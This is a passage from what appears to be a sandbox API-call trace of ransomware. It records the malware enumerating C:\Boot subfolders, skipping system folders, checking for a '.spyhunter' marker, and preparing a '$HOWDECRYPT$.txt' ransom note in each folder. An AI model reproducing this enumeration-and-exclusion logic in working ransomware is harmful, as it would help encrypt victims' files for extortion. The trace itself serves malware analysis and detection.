pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0080.315] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".spyhunter") returned 0x0 [0080.315] lstrcmpW (lpString1="BCD.LOG1", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.315] lstrcmpW (lpString1="BCD.LOG1", lpString2="_uninstalling_.png") returned 1 [0080.315] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0080.315] GetProcessHeap () returned 0x2c0000 [0080.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6a) returned 0x2fb0d8 [0080.315] GetProcessHeap () returned 0x2c0000 [0080.315] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x28) returned 0x2f9f40 [0080.315] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.315] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0080.315] lstrlenW (lpString="Windows") returned 7 [0080.315] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$Recycle.bin") returned 1 [0080.315] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.315] lstrcmpiW (lpString1="BCD.LOG2", lpString2="System Volume Information") returned -1 [0080.315] lstrlenW (lpString="System Volume Information") returned 25 [0080.315] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0080.315] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".spyhunter") returned 0x0 [0080.315] lstrcmpW (lpString1="BCD.LOG2", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.315] lstrcmpW (lpString1="BCD.LOG2", lpString2="_uninstalling_.png") returned 1 [0080.315] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0080.315] GetProcessHeap () returned 0x2c0000 [0080.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6a) returned 0x2fb150 [0080.315] GetProcessHeap () returned 0x2c0000 [0080.315] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x30) returned 0x2f9f40 [0080.316] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.316] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0080.316] lstrlenW (lpString="Windows") returned 7 [0080.316] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$Recycle.bin") returned 1 [0080.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.316] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="System Volume Information") returned -1 [0080.316] lstrlenW (lpString="System Volume Information") returned 25 [0080.316] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0080.316] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".spyhunter") returned 0x0 [0080.316] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.316] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="_uninstalling_.png") returned 1 [0080.316] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0080.316] GetProcessHeap () returned 0x2c0000 [0080.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x72) returned 0x2d12b0 [0080.316] GetProcessHeap () returned 0x2c0000 [0080.316] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x38) returned 0x2f9f40 [0080.316] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.316] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0080.316] lstrlenW (lpString="Windows") returned 7 [0080.316] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0080.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.316] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 [0080.316] lstrlenW (lpString="System Volume Information") returned 25 [0080.316] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0080.316] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0080.316] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0080.316] GetProcessHeap () returned 0x2c0000 [0080.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.317] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0080.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30b210 [0080.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.318] lstrlenW (lpString="Windows") returned 7 [0080.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.318] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.318] lstrlenW (lpString="System Volume Information") returned 25 [0080.318] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0080.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.318] FindNextFileW (in: hFindFile=0x30b210, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.318] lstrlenW (lpString="Windows") returned 7 [0080.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.318] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.318] lstrlenW (lpString="System Volume Information") returned 25 [0080.318] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0080.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.319] FindNextFileW (in: hFindFile=0x30b210, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.319] lstrlenW (lpString="Windows") returned 7 [0080.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.319] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.319] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.319] lstrlenW (lpString="System Volume Information") returned 25 [0080.319] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0080.319] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.319] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.319] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.319] lstrlenW (lpString="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0080.319] GetProcessHeap () returned 0x2c0000 [0080.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30c258 [0080.319] GetProcessHeap () returned 0x2c0000 [0080.319] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x40) returned 0x2f9f40 [0080.319] FindNextFileW (in: hFindFile=0x30b210, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.319] FindClose (in: hFindFile=0x30b210 | out: hFindFile=0x30b210) returned 1 [0080.319] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\$HOWDECRYPT$.txt") returned 34 [0080.319] lstrlenW (lpString="\\\\?\\C:\\Boot\\cs-CZ\\$HOWDECRYPT$.txt") returned 34 [0080.319] GetProcessHeap () returned 0x2c0000 [0080.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30c2e8 [0080.319] GetProcessHeap () returned 0x2c0000 [0080.319] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x48) returned 0x2f9f40 [0080.319] GetProcessHeap () returned 0x2c0000 [0080.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.319] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.319] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0080.319] lstrlenW (lpString="Windows") returned 7 [0080.319] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0080.320] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.320] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0080.320] lstrlenW (lpString="System Volume Information") returned 25 [0080.320] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0080.320] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0080.320] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0080.320] GetProcessHeap () returned 0x2c0000 [0080.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.320] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0080.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.320] lstrlenW (lpString="Windows") returned 7 [0080.320] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.320] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.320] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.320] lstrlenW (lpString="System Volume Information") returned 25 [0080.320] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0080.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.320] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.320] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.320] lstrlenW (lpString="Windows") returned 7 [0080.320] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.320] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.320] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.320] lstrlenW (lpString="System Volume Information") returned 25 [0080.320] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0080.320] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.320] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.320] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.320] lstrlenW (lpString="Windows") returned 7 [0080.321] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.321] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.321] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.321] lstrlenW (lpString="System Volume Information") returned 25 [0080.321] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0080.321] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.321] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.321] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.321] lstrlenW (lpString="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0080.321] GetProcessHeap () returned 0x2c0000 [0080.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30c3b8 [0080.321] GetProcessHeap () returned 0x2c0000 [0080.321] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2f9f40, Size=0x50) returned 0x30c448 [0080.321] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.321] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.321] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\$HOWDECRYPT$.txt") returned 34 [0080.321] lstrlenW (lpString="\\\\?\\C:\\Boot\\da-DK\\$HOWDECRYPT$.txt") returned 34 [0080.321] GetProcessHeap () returned 0x2c0000 [0080.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30c4a0 [0080.321] GetProcessHeap () returned 0x2c0000 [0080.321] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30c448, Size=0x58) returned 0x30c530 [0080.321] GetProcessHeap () returned 0x2c0000 [0080.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.321] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.321] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0080.321] lstrlenW (lpString="Windows") returned 7 [0080.321] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0080.321] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.321] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0080.322] lstrlenW (lpString="System Volume Information") returned 25 [0080.322] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0080.322] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0080.322] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0080.322] GetProcessHeap () returned 0x2c0000 [0080.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.322] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0080.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.323] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.323] lstrlenW (lpString="Windows") returned 7 [0080.323] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.323] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.323] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.323] lstrlenW (lpString="System Volume Information") returned 25 [0080.323] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0080.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.323] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.323] lstrlenW (lpString="Windows") returned 7 [0080.323] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.323] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.323] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.323] lstrlenW (lpString="System Volume Information") returned 25 [0080.323] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0080.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.324] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.324] lstrlenW (lpString="Windows") returned 7 [0080.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.324] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.324] lstrlenW (lpString="System Volume Information") returned 25 [0080.324] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0080.324] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.324] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.324] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0080.324] GetProcessHeap () returned 0x2c0000 [0080.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30c7b8 [0080.324] GetProcessHeap () returned 0x2c0000 [0080.324] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30c530, Size=0x60) returned 0x30c848 [0080.324] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.324] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.324] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\$HOWDECRYPT$.txt") returned 34 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Boot\\de-DE\\$HOWDECRYPT$.txt") returned 34 [0080.324] GetProcessHeap () returned 0x2c0000 [0080.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30c8b0 [0080.324] GetProcessHeap () returned 0x2c0000 [0080.324] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30c848, Size=0x68) returned 0x30c940 [0080.324] GetProcessHeap () returned 0x2c0000 [0080.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.325] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.325] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0080.325] lstrlenW (lpString="Windows") returned 7 [0080.325] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0080.325] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.325] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0080.325] lstrlenW (lpString="System Volume Information") returned 25 [0080.325] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0080.325] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0080.325] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0080.325] GetProcessHeap () returned 0x2c0000 [0080.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.325] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0080.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.325] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.325] lstrlenW (lpString="Windows") returned 7 [0080.325] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.325] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.325] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.325] lstrlenW (lpString="System Volume Information") returned 25 [0080.325] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0080.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.325] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.325] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.325] lstrlenW (lpString="Windows") returned 7 [0080.325] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.325] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.325] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.325] lstrlenW (lpString="System Volume Information") returned 25 [0080.326] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0080.326] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.326] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.326] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.326] lstrlenW (lpString="Windows") returned 7 [0080.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.326] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.326] lstrlenW (lpString="System Volume Information") returned 25 [0080.326] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0080.326] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.326] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.326] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.326] lstrlenW (lpString="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0080.326] GetProcessHeap () returned 0x2c0000 [0080.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30c9b0 [0080.326] GetProcessHeap () returned 0x2c0000 [0080.326] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30c940, Size=0x70) returned 0x30ca40 [0080.326] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.326] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.326] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\$HOWDECRYPT$.txt") returned 34 [0080.326] lstrlenW (lpString="\\\\?\\C:\\Boot\\el-GR\\$HOWDECRYPT$.txt") returned 34 [0080.326] GetProcessHeap () returned 0x2c0000 [0080.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30cab8 [0080.326] GetProcessHeap () returned 0x2c0000 [0080.326] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ca40, Size=0x78) returned 0x30cb48 [0080.326] GetProcessHeap () returned 0x2c0000 [0080.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.326] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.326] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0080.326] lstrlenW (lpString="Windows") returned 7 [0080.326] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0080.326] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.326] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0080.327] lstrlenW (lpString="System Volume Information") returned 25 [0080.327] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0080.327] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0080.327] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0080.327] GetProcessHeap () returned 0x2c0000 [0080.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.327] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0080.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.328] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.328] lstrlenW (lpString="Windows") returned 7 [0080.328] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.328] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.328] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.328] lstrlenW (lpString="System Volume Information") returned 25 [0080.328] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0080.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.328] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.328] lstrlenW (lpString="Windows") returned 7 [0080.328] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.328] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.328] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.328] lstrlenW (lpString="System Volume Information") returned 25 [0080.328] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0080.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.328] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.328] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.328] lstrlenW (lpString="Windows") returned 7 [0080.328] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.328] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.328] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.328] lstrlenW (lpString="System Volume Information") returned 25 [0080.328] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0080.328] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.328] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.328] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.329] 